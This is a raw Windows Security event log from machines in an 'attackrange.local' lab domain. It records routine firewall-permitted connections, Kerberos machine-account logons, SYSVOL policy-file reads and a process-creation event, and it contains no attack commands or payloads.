ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278802
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60604
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278801
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 60604
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887049
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53267
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:15 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887048
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 60604
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887051
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1256
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887050
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1256
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278805
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53905
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278806
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53906
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887066
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CE9F6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 1259
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887065
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE9F6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887064
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 1259
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887063
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1259
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887062
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1259
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887061
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CE9AD
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887060
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE9AD
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887059
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CE8BF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {59EBA460-5AD1-E5F1-2935-C9E9C7858E5D}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1258
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887058
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE8BF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887057
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1258
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887056
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1258
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887055
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 1258
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887054
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 49702
Destination Address: ::1
Destination Port: 389
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887053
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1257
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887052
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1257
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887077
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE8BF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887076
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE9AD
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887075
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CE9F6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=887074
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CEA88
Network Information:
Object Type: File
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Share Information:
Share Name: \\*\SYSVOL
Share Path: \??\C:\Windows\SYSVOL\sysvol
Relative Target Name: attackrange.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\gpt.ini
Access Request Information:
Access Mask: 0x120089
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
Access Check Results:
READ_CONTROL: Granted by Ownership
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;WD)
ReadEA: Granted by D:(A;;0x1200a9;;;WD)
ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=887073
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CEA88
Network Information:
Object Type: File
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Share Information:
Share Name: \\*\SYSVOL
Share Path: \??\C:\Windows\SYSVOL\sysvol
Relative Target Name: attackrange.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\gpt.ini
Access Request Information:
Access Mask: 0x120089
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
Access Check Results:
READ_CONTROL: Granted by Ownership
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;WD)
ReadEA: Granted by D:(A;;0x1200a9;;;WD)
ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=File Share
OpCode=Info
RecordNumber=887072
Keywords=Audit Success
Message=A network share object was accessed.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CEA88
Network Information:
Object Type: File
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Share Information:
Share Name: \\*\SYSVOL
Share Path: \??\C:\Windows\SYSVOL\sysvol
Access Request Information:
Access Mask: 0x1
Accesses: ReadData (or ListDirectory)
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887071
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8CEA88
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {82D4DD29-80E2-D71B-FE5B-22F827B57A26}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887070
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x8CEA88
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887069
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 445
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887068
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 1260
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 445
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887067
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Source Address: ::
Source Port: 1260
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887079
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1261
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887078
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1261
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:27 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278807
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53907
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:30 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887081
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x1548
New Process Name: C:\Windows\System32\TSTheme.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x34c
